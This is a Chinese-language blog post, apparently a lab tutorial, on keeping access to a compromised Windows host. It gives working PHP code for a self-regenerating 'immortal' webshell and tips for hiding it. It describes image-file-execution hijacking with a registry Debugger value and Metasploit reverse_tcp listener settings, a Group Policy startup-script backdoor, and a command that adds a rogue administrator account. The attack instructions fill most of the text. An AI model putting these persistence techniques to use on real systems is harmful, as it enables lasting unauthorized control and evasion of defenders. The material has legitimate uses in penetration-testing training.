Windows权限维持之php不死马、映像劫持、策略组脚本
文中主要讲解Windows权限维持中的小技巧,通过了解掌握php不死马、映像劫持、策略组脚本等方式,更快知晓权限维持作用。本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。
PHP不死马:
<?php
ignore_user_abort(); //关掉浏览器,PHP脚本也可以继续执行.
set_time_limit(0);//通过set_time_limit(0)可以让程序无限制的执行下去
$interval = 5; // 每隔*秒运行
do {$filename = 'test.php';
if(file_exists($filename)) {echo "xxx";
}
else {$file = fopen("test.php", "w");
$txt = "<?php phpinfo();?>\n";
fwrite($file, $txt);
fclose($file);
}
sleep($interval);
} while (true);
?>
假设我们获取一个webshell,需要进行权限维持,那么第一种就是php不死马这代码的意思就是当执行php文件的时候,会每5秒生成一个test.php文件,里面写入phpinfo;写入的位置可以是exe文件,或者一句话木马,从而达到维持权限的目的。生成的文件就算删除,每五秒也会在进行生成。除非重启apache服务,先删除生成的文件,再将最原始的php文件删除。同样我们可以最原始的php文件设置成只读加隐藏,避免被发现。
映像劫持技术
通过在注册表这个位置,先添加一个项,这个项和你的后门执行文件名一致:
然后在右侧建立一个字符串Debugger,输入你后门的绝对路径。
修改注册表:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image File
Execution Options
regedit
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.45.135
set LPORT 12345
开启监听:
这里我们将phpstudy的安装文件修改为注册表中新添加的项名称long.exe,然后点击执行。
成功反弹:
策略组脚本维持
输入gpedit.msc 打开组策略,打开 windows设置 ->脚本(启动/关机) 在启动属性里面加上你的后门,那么每次重启再开机后,就会执行你的后门,同样达到权限维持
C:\Windows\System32\GroupPolicy\Machine\Scripts\Startup
gpedit.msc
将你的后门文件存放这个绝对路径下:
net user Long 123456 /add && net localgroup administrators Long /add
账号成功添加:
这里同样也可以留成你的反弹shell后门
Windows权限维持之php不死马、映像劫持、策略组脚本相关推荐
- 权限维持之打造不一样的映像劫持后门
0x01 前言 "映像劫持",也被称为"IFEO"(Image File Execution Options),在WindowsNT架构的系统里,IFEO的本意 ...
- 7.awd不死马权限维持及变种
不死马又叫内存马,就是运行一段永远不退出的程序常驻在PHP进程里,无限执行. 不死马.php->上传到server->server执行文件->server本地无限循环生成 (一句话. ...
- 渗透测试-不死马的创建和查杀
不死马的创建和查杀 文章目录 不死马的创建和查杀 0x00 创建 0x01 查看 0x02 查杀 root用户角度的查杀: 重启web服务. 其他用户的查杀: 0x00 创建 md5加密密码: 代码: ...
- 内网渗透测试:Windows权限提升思路
我的Freebuf:https://www.freebuf.com/author/MrAnonymous 我的博客:https://whoamianony.top/ 文章目录 Windows系统内核溢 ...
- 关于PHP不死马的分析和总结
PHP不死马是我们达到权限维持的目的. 不死马的原理: 由客户端发起的Web请求后,中间件的各个独立的组件如Listener.Filter.Servlet等组件会在请求过程中做监听.判断.过滤等操作, ...
- 不死马php如何取证_AWD不死马与克制方法
一个简单的不死马如: ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); $file = '.3.php'; $code = ' ...
- AWD-----监控不死马垃圾包资源库
1.知识: AWD规则: 2.防守-----流量监控-----实时获取访问数据包流量 利用 WEB 访问监控配合文件监控能实现 WEB 攻击分析及后门清除操作,确保写入后门操作失效,也能确保分析到无后 ...
- powershell设置了权限依旧无法运行脚本_没用的知识汇总+1 Windows 权限维持汇总...
文中所提到的利用方式均在WIN10与2016中进行了测试.文中所提技术仅用于内部测试,请勿进行非法利用. Windows 启动目录: Windows 启动目录分为,用户启动目录,与系统启动目录. 用户 ...
- Windows权限设置详解
Windows权限设置详解 随着动网论坛的广泛应用和动网上传漏洞的被发现以及SQL注入式***越来越多的被使用,WEBSHELL让防火墙形同虚设,一台即使打了所有微软补丁.只让80端口对外开放的WEB ...
最新文章
- 【精辟】人工智能先锋人物杰夫·辛顿说:“深度学习将无所不能”
- Nagios监控Dell服务器硬件状态
- 当redis执行flush操作后的补救措施
- 《深入理解OSGi:Equinox原理、应用与最佳实践》一2.2 Bundle
- PDU (Protocol Data Unit) - 协议数据单元
- Java Calendar类知识点总结
- 众信金融8·28开放日:聆听投资人心声
- 模拟电子技术,电力电子技术
- 2022最火的一款网盘赚钱系统源码 仿制蓝奏网盘/城通网盘/分享赚钱云盘系统/网盘VIP下载系统
- Python软件编程等级考试四级——20210905
- 炼数成金(dataguru)IT技能修炼
- 离散实验 判断集合之间是单射,满射还是双射
- python中文开发环境_python中文开发环境
- 通过userAgent判断是是否手机、微信、手机厂家
- [Unity基础]GL图像库
- 一文看懂计算机网络五层协议+各层网络协议大全
- 驱动编程:注册表回调,进程回调,文件回调,进程隐藏断链,窗口保护
- 原生JavaScript随机点名表
- 18、VXLAN技术介绍与应用场景,附VXLAN手册下载
- Pytorch打怪路(三)Pytorch创建自己的数据集2